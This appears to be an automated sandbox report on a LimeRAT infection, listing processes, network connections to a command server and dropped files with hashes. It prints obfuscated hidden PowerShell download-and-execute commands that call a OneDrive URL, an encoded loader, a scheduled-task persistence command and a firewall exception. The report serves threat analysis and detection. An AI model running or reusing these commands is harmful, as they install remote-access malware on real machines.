"C:\Windows\svchost.com" "C:\Windows\System32\WINDOW~1\v1.0\powershell.exe" -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command &('I'+'EX')(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://onedrive.live.com/download?cid=C8B73A1421789816&resid=C8B73A1421789816%21127&authkey=APb9b-AX6H71Tjw')

C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe

C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuACIAYABEAGAAbwBgAHcAYABOAGAAbABgAG8AYABBAGAAZABgAFMAYABUAGAAUgBgAGkAYABOAGAAZwAiACgAJwBoAFQlVCVwADoAiCWIJYgliCWIJYgliCWIJWMAaAA8JTwlPCU8JXAAYQAuAG0AeQB3AGkAcgBlAC4APCU8JTwlPCVyAGcAiCWIJYgliCVmAC4AagBwAGcAJwAuAHIAZQBwAGwAYQBjAGUAKAAnAIgliCWIJYglJwAsACcALwAnACkALgByAGUAcABsAGEAYwBlACgAJwA8JTwlPCU8JScALAAnAG8AJwApAC4AcgBlAHAAbABhAGMAZQAoACcAVCUnACwAJwB0ACcAKQApAC4AcgBlAHAAbABhAGMAZQAoACcAIQAnACwAJwBBACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACMAJwAsACcAQgAnACkALgByAGUAcABsAGEAYwBlACgAJwA/ACcALAAnAEUAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAMgAwADAAMAAgAC0AIAAkADIAMAAwADAALAAkAG4AdQBsAGwAKQANAAoA

C:\Windows\SysWOW64\WINDOW~1\v1.0\powershell.exe

C:\Windows\System32\WINDOW~1\v1.0\powershell.exe -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command &('I'+'EX')(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://onedrive.live.com/download?cid=C8B73A1421789816&resid=C8B73A1421789816%21127&authkey=APb9b-AX6H71Tjw')

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 636

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Data.exe"

C:\Users\Admin\AppData\Roaming\Data.exe

C:\Users\Admin\AppData\Roaming\Data.exe

C:\Windows\system32\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Data.exe" "Data.exe" ENABLE

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\Monitor.exe'"

C:\Users\Admin\AppData\Roaming\Monitor.exe

C:\Users\Admin\AppData\Roaming\Monitor.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\Monitor.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 onedrive.live.com udp
US 8.8.8.8:53 chopa.mywire.org udp
US 13.107.42.13:443 onedrive.live.com tcp
ES 81.61.77.92:8000 tcp
US 8.8.8.8:53 rnqkma.bn.files.1drv.com udp
US 13.107.42.12:443 rnqkma.bn.files.1drv.com tcp
ES 81.61.77.92:5553 tcp
ES 81.61.77.92:8000 tcp
ES 81.61.77.92:5553 tcp
ES 81.61.77.92:8000 tcp
ES 81.61.77.92:5553 tcp
ES 81.61.77.92:8000 tcp
ES 81.61.77.92:5553 tcp
ES 81.61.77.92:8000 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
ES 81.61.77.92:5553 tcp

Files

memory/904-54-0x00000000764C1000-0x00000000764C3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe

MD5 9bc3a910746cc9474e22bf5893b167af
SHA1 1ce4c754b9e94bd89e09dbd38071739ef276f91d
SHA256 a8a0d6aa1c57d9f2e154e4e2d7910e96f7ce9ddb322b79ec551b5fa166cade00
SHA512 236ed3faa25e5bb90d1c51ece2e4336e4a4f759a8e75a82afee7c7cc1599012142e02832144113bc7fba4a5ba2ddca8249b8e39b36ae59ed022381a9fe18216d

memory/1324-56-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe

MD5 9bc3a910746cc9474e22bf5893b167af
SHA1 1ce4c754b9e94bd89e09dbd38071739ef276f91d
SHA256 a8a0d6aa1c57d9f2e154e4e2d7910e96f7ce9ddb322b79ec551b5fa166cade00
SHA512 236ed3faa25e5bb90d1c51ece2e4336e4a4f759a8e75a82afee7c7cc1599012142e02832144113bc7fba4a5ba2ddca8249b8e39b36ae59ed022381a9fe18216d

C:\Users\Admin\AppData\Local\Temp\3582-490\a0a3bc07227d7169a697f3aff430ff62af3d856802551fc0d63c1e0e1e45820f.exe

MD5 9bc3a910746cc9474e22bf5893b167af
SHA1 1ce4c754b9e94bd89e09dbd38071739ef276f91d
SHA256 a8a0d6aa1c57d9f2e154e4e2d7910e96f7ce9ddb322b79ec551b5fa166cade00
SHA512 236ed3faa25e5bb90d1c51ece2e4336e4a4f759a8e75a82afee7c7cc1599012142e02832144113bc7fba4a5ba2ddca8249b8e39b36ae59ed022381a9fe18216d

C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

memory/108-66-0x0000000000000000-mapping.dmp

memory/1888-76-0x0000000000000000-mapping.dmp

memory/1808-78-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\images.exe

MD5 9a3a6d3562b8b2f6794acba836aefdb7
SHA1 317ba6fe78187d043dcef3828c18f29ec75e9502
SHA256 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac
SHA512 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc

memory/1744-96-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Sound.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

C:\Users\Admin\AppData\Roaming\script.js

MD5 b5880f974df1c12375a7c1d973654ba3
SHA1 0bdce8600e24bf22600d299f20ba62230293a0db
SHA256 a9a94f73ae45f879f251e0ca8b2feb82057b4d793673bf2f57cc4bba58ed2e25
SHA512 d25f058d8e0af363acf2964227b95d5b27847e7cdf03f15e3845817973d85df86685bb74ec6c7ddb90747e75943f5b9a5d27b4f366ef2fda1ddb660fd4c5801a

\Users\Admin\AppData\Roaming\Sound.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

\Users\Admin\AppData\Roaming\Sound.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

C:\Users\Admin\AppData\Roaming\Sound.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

C:\Users\Admin\AppData\Roaming\svcripts.vbs

MD5 c23ba5de4e95d79c987165773bd4710d
SHA1 f71c5d7761888a1747e4ab0310d31500002845e6
SHA256 d2b21945cdf209e4b38fa57f5a3bb24d4d4c5e670959f00d00c8e001ce9b0c09
SHA512 e115266d9189b297d672a9f2d13ba98d913cba3c90fc630cc14e5b1095c5f61dc1ca7d29c5083b66c02d79e93eadb95d411b849c6bc693184fd63205b454fcb1

C:\Users\Admin\AppData\Roaming\scripts.vbs

MD5 6bc888f264b6ad4e3cabda337ebdaf1b
SHA1 13f431ce35157695fae9c2ef4729ea478d17425f
SHA256 8adf34f5a2d889ce512e8620ba2828ed7932d077b36a2c3a5f89cafcd2d399bb
SHA512 44fe61c6d1ef1a1b678f555d689628d7a45be0460c93e4406a07316953da92672b7453a27cba1d16180da8d2067a0cdeb216b5eedfbf9de79afc6d6969187a37

C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe

MD5 cf6c595d3e5e9667667af096762fd9c4
SHA1 9bb44da8d7f6457099cb56e4f7d1026963dce7ce
SHA256 593e60cc30ae0789448547195af77f550387f6648d45847ea244dd0dd7abf03d
SHA512 ff4f789df9e6a6d0fbe12b3250f951fcf11e857906c65e96a30bb46266e7e1180d6103a03db2f3764e0d1346b2de7afba8259ba080057e4a268e45e8654dfa80

\Users\Admin\AppData\Roaming\images.exe

MD5 9a3a6d3562b8b2f6794acba836aefdb7
SHA1 317ba6fe78187d043dcef3828c18f29ec75e9502
SHA256 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac
SHA512 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc

\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

memory/1104-86-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Roaming\images.exe

MD5 9a3a6d3562b8b2f6794acba836aefdb7
SHA1 317ba6fe78187d043dcef3828c18f29ec75e9502
SHA256 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac
SHA512 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc

\Users\Admin\AppData\Roaming\images.exe

MD5 9a3a6d3562b8b2f6794acba836aefdb7
SHA1 317ba6fe78187d043dcef3828c18f29ec75e9502
SHA256 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac
SHA512 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc

C:\Users\Admin\AppData\Roaming\images.exe

MD5 9a3a6d3562b8b2f6794acba836aefdb7
SHA1 317ba6fe78187d043dcef3828c18f29ec75e9502
SHA256 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac
SHA512 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc

C:\MSOCache\ALLUSE~1\{90140~1\DW20.EXE

MD5 02ee6a3424782531461fb2f10713d3c1
SHA1 b581a2c365d93ebb629e8363fd9f69afc673123f
SHA256 ead58c483cb20bcd57464f8a4929079539d634f469b213054bf737d227c026dc
SHA512 6c9272cb1b6bde3ee887e1463ab30ea76568cb1a285d11393337b78c4ad1c3b7e6ce47646a92ab6d70bff4b02ab9d699b84af9437b720e52dcd35579fe2693ec

C:\MSOCache\ALLUSE~1\{9A861~1\setup.exe

MD5 15944169d4ddce1fe96707312a750d90
SHA1 d7b5562942994d7626fa046ade456af570b1e5f9
SHA256 c3bd17005e47d2ca15344c434ecbd7fb82f4a2b0e25cdd57ba30be96662860ad
SHA512 7e780c5aef223f6b41e9207df167a1e6b9f14191fbf4f039789341f3bd97770376e908d7eb92616e0fbe17cc0754844551b1e78db10c205d8cc71b5071659ccc

C:\MSOCache\ALLUSE~1\{9A861~1\ose.exe

MD5 58b58875a50a0d8b5e7be7d6ac685164
SHA1 1e0b89c1b2585c76e758e9141b846ed4477b0662
SHA256 2a0aa0763fdef9c38c5dd4d50703f0c7e27f4903c139804ec75e55f8388139ae
SHA512 d67214077162a105d01b11a8e207fab08b45b08fbfba0615a2ea146e1dd99eea35e4f02958a1754d3192292c00caf777f186f0a362e4b8b0da51fabbdb76375b

C:\Windows\directx.sys

MD5 b681422f35254a4040cc95d34543c7ef
SHA1 45522ff90230eae7c7f3d7843b954553a4b61004
SHA256 f5ba621473ff11b8461b3d8e250aa0470f760adf34de4692796b05f700a27aa4
SHA512 c60e0189f32d35da0c44191f03b25aaa05664a50a4b7ae4232727903dcd2476e353b618a5833e740ef9837ea13ec5f434ddf15da9e507cf0b734e973bbef7a94

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

C:\Windows\directx.sys

MD5 b681422f35254a4040cc95d34543c7ef
SHA1 45522ff90230eae7c7f3d7843b954553a4b61004
SHA256 f5ba621473ff11b8461b3d8e250aa0470f760adf34de4692796b05f700a27aa4
SHA512 c60e0189f32d35da0c44191f03b25aaa05664a50a4b7ae4232727903dcd2476e353b618a5833e740ef9837ea13ec5f434ddf15da9e507cf0b734e973bbef7a94

C:\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

memory/524-71-0x0000000000000000-mapping.dmp

memory/588-70-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

memory/524-102-0x0000000000A60000-0x0000000000A80000-memory.dmp

memory/2032-65-0x0000000000000000-mapping.dmp

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

C:\Windows\directx.sys

MD5 ba27016266e2ada13295967a1cd36aff
SHA1 7ff20aef0bf6574152292dd7012f17784949f9f9
SHA256 acf203a2045ae52fb1169ea0d0f7bd5e383655bc436001712d03b913ad568105
SHA512 ace0e666083a77f3f8a69e888a140b227295bafd8052d1ee275bf72583d841f07b5f7e09f2c2872452512d224b002874ecd01ede16028bab4e354e112b1d0971

memory/1744-118-0x00000000000E0000-0x000000000011A000-memory.dmp

\Users\Admin\AppData\Roaming\Sound.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

memory/1104-116-0x0000000000860000-0x000000000089A000-memory.dmp

memory/1880-120-0x0000000000000000-mapping.dmp

memory/1952-119-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Roaming\images.exe

MD5 9a3a6d3562b8b2f6794acba836aefdb7
SHA1 317ba6fe78187d043dcef3828c18f29ec75e9502
SHA256 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac
SHA512 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc

\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

\Users\Admin\AppData\Roaming\Sound.exe

MD5 a76afee2b8f9ac817875621e55de6a0a
SHA1 fef92a35b4ff174e16fd925e6903dd71ee186e7e
SHA256 5bbb5203b495577a903eec37bd493f72471ef07a79108f22d75b777826043e25
SHA512 e7ba477110ef8801ea8bb36f8b7b447e0542d29f379c444411e4cd2edfe4a6c12b35dd73a80a232e47ce01a83bc5ce03db2359fc65a52625a455e69874679d9d

\Users\Admin\AppData\Roaming\images.exe

MD5 9a3a6d3562b8b2f6794acba836aefdb7
SHA1 317ba6fe78187d043dcef3828c18f29ec75e9502
SHA256 492a90534403d9c9c3f4815187e4694aacb92c23b5102adfd68964b7ff50eaac
SHA512 2a6f4a7691d101d27bfab34bca2349ab59d6d493e1e7d0c4e54c663cf92d9018a490d62f9049d47b1606d233dc9da099cfdd9ac2259c977ab4c60ece3dabbadc

\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

C:\Windows\directx.sys

MD5 ba27016266e2ada13295967a1cd36aff
SHA1 7ff20aef0bf6574152292dd7012f17784949f9f9
SHA256 acf203a2045ae52fb1169ea0d0f7bd5e383655bc436001712d03b913ad568105
SHA512 ace0e666083a77f3f8a69e888a140b227295bafd8052d1ee275bf72583d841f07b5f7e09f2c2872452512d224b002874ecd01ede16028bab4e354e112b1d0971

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

memory/1008-103-0x0000000000000000-mapping.dmp

memory/932-104-0x0000000000000000-mapping.dmp

memory/1352-61-0x0000000000000000-mapping.dmp

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 db4546ac526dd7c9a014044e4c212e25
SHA1 3b58d4cbcf59d91fa0884e5b4503a0ef849ee17f
SHA256 acac569401f35fb90d7401fb76a33ad818a4439df29945c91a9ffd7819b8fb00
SHA512 6097fe66dd875d957e5e261421c1f476885c75083b4e226f601c8e06329921d31dc8c2fb386a294759a73f82cf33cdf2721fe1644c2d8ab83cf6b05dcba3423c

memory/1744-125-0x0000000000370000-0x0000000000376000-memory.dmp

C:\PROGRA~2\Adobe\READER~1.0\Reader\AcroRd32.exe

MD5 3ec4922dbca2d07815cf28144193ded9
SHA1 75cda36469743fbc292da2684e76a26473f04a6d
SHA256 0587fd366ea7e94b3ae500874b1c5d684b5357fcc7389682d5a13c3301a28801
SHA512 956c3a1f2689cb72600edd2e90d652b77592a8a81d319dce026e88f6c02231af06aebd57d68460eb406de00c113522173423cb1b339a41a3918f379c7dc311f7

\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE

MD5 9e2b9928c89a9d0da1d3e8f4bd96afa7
SHA1 ec66cda99f44b62470c6930e5afda061579cde35
SHA256 8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043
SHA512 2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE

MD5 9e2b9928c89a9d0da1d3e8f4bd96afa7
SHA1 ec66cda99f44b62470c6930e5afda061579cde35
SHA256 8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043
SHA512 2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

memory/864-129-0x0000000000000000-mapping.dmp

C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\LICLUA.EXE

MD5 3a928dbfdd154534651434bc1c574259
SHA1 8619df5eaaa8ceab6418136789d2f172ce0d2a83
SHA256 00ca35c94353f0c583bc4423a7623631673400a1c3c6678cf565fa202769f148
SHA512 ce942aca8a23de012b8adfda84a630c1e8fc2431ace86e953aa2a8966d7e89d7631b7aed8a0810387c1d4413a1ea1b519167c57287071b05e09c5dec1efae826

\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

memory/1104-136-0x0000000000170000-0x000000000017C000-memory.dmp

memory/1744-135-0x0000000000390000-0x000000000039A000-memory.dmp

\Users\Admin\AppData\Roaming\LOLCHE~1.EXE

MD5 c7ec2f35a541aace005fa867f73bb1af
SHA1 3eb3582fd112d5cd94d17edef41ab4b4ba4c11ad
SHA256 423970039d7bfcb9a2f0984d7aadcd8d8826a6520608574e2f0b16b6eabf0358
SHA512 b6940a298643547397b1b48c86712820f13e3b27bec7fb317ca66ab0229ab0becb22bc2882872507fa348dd9dc62997fe4488c10b0e2aec76dc62890692fb0df

C:\PROGRA~2\MICROS~1\Office14\ACCICONS.EXE

MD5 12938ed361c61ccbf05cb7c8b28149d5
SHA1 f2085c71a80be5410618d1ef0a679a96261f998e
SHA256 f1316a16dc7aa7326433ea164ca070296366b2f3a1b3c9a55caed32055dc00dd
SHA512 4a765e20024872ac1c8e708e6a1643d5a36bbf9b32b54e25c46ee35ed4b03c6aebef8fe885b3ced4ec811177325dc922bff1a2312233b619283f16ec9f63d2f0

C:\PROGRA~2\MICROS~1\Office14\MSOHTMED.EXE

MD5 44623cc33b1bd689381de8fe6bcd90d1
SHA1 187d4f8795c6f87dd402802723e4611bf1d8089e
SHA256 380154eab37e79ed26a7142b773b8a8df6627c64c99a434d5a849b18d34805ba
SHA512 19002885176caceb235da69ee5af07a92b18dac0fb8bb177f2c1e7413f6606b1666e0ea20f5b95b4fa3d82a3793b1dbe4a430f6f84a991686b024c4e11606082

memory/1952-140-0x0000000070970000-0x0000000070F1B000-memory.dmp

memory/1880-141-0x0000000070970000-0x0000000070F1B000-memory.dmp

memory/1744-142-0x000007FEFBD41000-0x000007FEFBD43000-memory.dmp

C:\Windows\svchost.com

MD5 8e112ef2c863c54f398e849ac946b91e
SHA1 7a74905ddbef2c834895001d820cac7780b2fd0e
SHA256 b03be64b0062378dd946498c08af27896bc16c472579e9cdf63df75dff267440
SHA512 d4d9e64e3c941f2f8156f14016519edd67c6bcf5b8ac2a39ef13edf16299ab1254fbe463008feada770c61eb88b20bf2e7f8b96e4aea9c78718bee96b3e8feb4

C:\Windows\directx.sys

MD5 ba27016266e2ada13295967a1cd36aff
SHA1 7ff20aef0bf6574152292dd7012f17784949f9f9
SHA256 acf203a2045ae52fb1169ea0d0f7bd5e383655bc436001712d03b913ad568105
